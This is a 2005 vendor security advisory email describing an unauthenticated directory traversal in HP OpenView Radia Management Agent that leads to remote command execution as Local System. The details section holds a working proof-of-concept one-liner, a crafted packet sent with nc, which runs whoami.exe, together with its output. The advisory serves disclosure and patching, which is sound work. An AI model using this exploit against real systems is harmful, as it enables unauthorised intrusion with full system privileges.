Date: Thu, 28 Jul 2005 10:19:56 +0100
From: NGSSoftware Insight Security Research <nisr@nextgenss.com.>
To: [email protected], [email protected],
Subject: HP OpenView Radia Management Agent remote command execution via directory
traversal
X-Enigmail-Version: 0.89.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: antivirus-gw at tyumen.ru
NGSSoftware Insight Security Research Advisory
Name: HP OpenView Radia Management Agent remote command execution via
directory traversal
Systems Affected: HP OpenView Radia Management Portal versions 2.x and
1.x running Radia Management Agent
Severity: High
Vendor URL: http://www.hp.com/
Authors: David Morgan [email protected]
Dominic Beecher [email protected]
Date of initial advisory: 28 April 2005
Date of full advisory: 28 July 2005
Description
The Radia Management Agent is part of HP's OpenView Radia suite of
software. It runs as a Windows service (RMA) with Local System
privileges. The RMA service listens on a TCP port that is not fixed. In
the example below, the service was listening on TCP port 1065.
By connecting to the TCP port and sending a crafted packet, it is
possible to traverse out of C:\Program Files\Novadigm (the apparent
working directory) and run any executable that is located on the same
logical disk partition, in this case the C: drive.
Details
C:\>sc queryex rma
SERVICE_NAME: rma
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE,
IGNORES_SHUTDOWN))
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 1032
FLAGS :
C:\>netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:1065 0.0.0.0:0 LISTENING 1032
bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v
xx.xx.xx.xx 1065
host.domain [xx.xx.xx.xx] 1065 (?) open
nt authority\system
The output from whoami.exe clearly demonstrates that it is possible for
a remote attacker to execute arbitrary system commands with Local System
privileges without authentication.
Fix Information
HP has developed a patch to fix the problem. More information can be
found in their security bulletin HPSBMA01138:
http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01138
About NGSSoftware
NGSSoftware design, research and develop intelligent, advanced
application security assessment scanners. Based in the United Kingdom,
NGSSoftware have offices in the South of London and the East Coast of
Scotland. NGSSoftware's sister company NGSConsulting, offers best of
breed security consulting services, specialising in application, host
and network security assessments.
http://www.ngssoftware.com/
Tel: +44 (0)20 8401 0070
Fax: +44 (0)20 8401 0076
[email protected]
